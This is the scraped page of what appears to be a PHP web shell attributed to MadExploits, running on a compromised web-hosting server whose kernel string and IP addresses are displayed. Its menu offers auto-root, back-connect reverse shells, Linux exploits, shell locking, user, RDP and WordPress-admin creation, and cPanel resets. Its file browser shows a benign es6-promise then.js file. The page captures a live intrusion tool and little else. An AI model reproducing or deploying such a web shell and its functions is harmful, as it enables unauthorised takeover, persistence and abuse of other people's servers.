Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.226.87.168
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
es6-promise /
lib /
es6-promise /
[ HOME SHELL ]
Name
Size
Permission
Action
promise
[ DIR ]
drwxr-xr-x
-internal.js
5.19
KB
-rw-r--r--
asap.js
3.1
KB
-rw-r--r--
enumerator.js
2.78
KB
-rw-r--r--
polyfill.js
724
B
-rw-r--r--
promise.js
9.81
KB
-rw-r--r--
then.js
609
B
-rw-r--r--
utils.js
468
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : then.js
import { invokeCallback, subscribe, FULFILLED, REJECTED, noop, makePromise, PROMISE_ID } from './-internal'; import { asap } from './asap'; export default function then(onFulfillment, onRejection) { const parent = this; const child = new this.constructor(noop); if (child[PROMISE_ID] === undefined) { makePromise(child); } const { _state } = parent; if (_state) { const callback = arguments[_state - 1]; asap(() => invokeCallback(_state, child, callback, parent._result)); } else { subscribe(parent, child, onFulfillment, onRejection); } return child; }
Close